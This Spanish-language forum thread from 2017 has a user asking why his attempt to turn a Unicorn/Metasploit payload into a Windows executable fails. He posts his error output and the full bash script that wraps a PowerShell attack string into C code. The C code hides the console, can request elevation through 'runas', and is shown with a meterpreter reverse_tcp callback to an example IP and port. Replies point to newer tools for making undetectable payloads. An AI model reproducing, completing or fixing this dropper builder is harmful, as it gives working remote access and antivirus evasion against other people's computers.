[SOLUCIONADO] unicorn, problema al compilar payload

Iniciado por redferne, Mayo 29, 2017, 04:41:42 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Mayo 29, 2017, 04:41:42 AM Ultima modificación: Mayo 31, 2017, 04:10:31 PM por xyz
salud:
siguiendo las indicaciones de "antrax" para compilar un payload con "unicorn"
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
consigo llegar hasta la compilacion online  pero me da un error  os pongo lo que sale....al crear el payload con el "unicorn" obtengo este mensaje

Código: text

Unicorn Powershell2C code generator  
Works for Vista, Win7, Win8 32/64 bit
--------------------------------------
Generating nonUAC unicorn.c ...
[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode...
[!] Length of shellcode was not generated. Check payload name and if Metasploit is working and try again.
Exiting....
cat: powershell_attack.txt: No existe el fichero o el directorio
./Unicornio.sh: línea 35: todos: no se encontró la orden
[*] Exported unicorn.c To compile use cl.exe unicorn.c

   



luego abro el arhivo "unicornio.c" con el leafpad copio lo que hay  lo pego en la pagina le doy a compilar en C++ para windows yme arroja este error, y no me genera ningun "xxxxxx.exe" ,me genera un "xxxx.c" las paginas que uso son
Código: php
http://www.onlinecompiler.net/ccplusplus
https://ideone.com/]
http://www.onlinecompiler.net/ccplusplus
https://ideone.com/



Código: text

Filename: jr9Ir7tv Compiler Return Value: 1 Compiler Output:
jr9Ir7tv.c:5:20: fatal error: aclapi.h: No such file or directory
#include
^
compilation terminated.

Link to source file: jr9Ir7tv.c COULD NOT SUCCESSFULLY COMPILE! BACK


Mayo 30, 2017, 02:41:09 PM #1 Ultima modificación: Mayo 30, 2017, 05:01:50 PM por xyz
Ahora el proceso de generar el Payload es con Python, ve a la Githun del autor, y cambia un poco el funcionamiento pero es igual de efectivo

Código: php
https://astr0baby.wordpress.com/2013/06/20/unicorn-2-c-source-generator/


Saludos!
Mayo 31, 2017, 03:26:02 AM #2
En su web tiene este código para luego compilar un XxX.exe ,este es el código

Código: python
#!/bin/bash
clear
echo '--------------------------------------'
echo ' Unicorn Powershell2C code generator  '
echo 'Works for Vista, Win7, Win8 32/64 bit'
echo '--------------------------------------'
if [ -z "$*" ];then  
echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform' 
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo 'Valid platforms are: nonuac uac' 
exit 0 
fi
case $4 in 
nonuac)
echo 'Generating nonUAC unicorn.c ...' 
python unicorn.py $1 $2 $3  
echo '#include <stdio.h>' > unicorn.c 
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c 
echo '#include <aclapi.h>' >> unicorn.c 
echo '#include <shlobj.h>' >> unicorn.c 
echo '#include <windows.h>' >> unicorn.c 
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c  
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c 
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c 
echo 'FreeConsole();' >> unicorn.c  
echo -n ' ShellExecute( NULL,NULL, "powershell.exe", "' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{11}//' >> unicorn.c
echo -n '",NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c 
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c 
todos unicorn.c 
echo '[*] Exported unicorn.c To compile use cl.exe unicorn.c'
;;

uac)
echo 'Generating UAC  unicorn.c ...'
python unicorn.py $1 $2 $3
echo '#include <stdio.h>' > unicorn.c
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c
echo '#include <windows.h>' >> unicorn.c
echo '#include <aclapi.h>' >> unicorn.c
echo '#include <shlobj.h>' >> unicorn.c
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c
echo 'FreeConsole();' >> unicorn.c
echo -n ' ShellExecute( NULL, "runas", "powershell.exe", "' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{11}//' >> unicorn.c
echo -n '",NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c
todos unicorn.c
echo '[*] Exported unicorn.c To compile use cl.exe unicorn.' 
;;

"")
echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo 'Valid platforms are: nonuac, uac' 
exit 0 
;;
esac


Ese código lo pego en un compilar online formato salida C++ y me da el error que comento, no genera un XxX.exe genera un XxX.c
He actualizado Python ,he probado con otras distribuciones....Y sigue igual, así que por eso pregunto si ese código funciona.
Mayo 31, 2017, 01:56:23 PM #3
Al parecer ese codigo no funciona, el autor ahora genera los "indetectables" de otra manera, y utiliza una herramienta en Python, ya no sigas peleando con ese codigo xD
Mayo 31, 2017, 03:49:59 PM #4
Ok, a otra cosa entonces
Imprimir
Ir Arriba Páginas1
Acciones del Usuario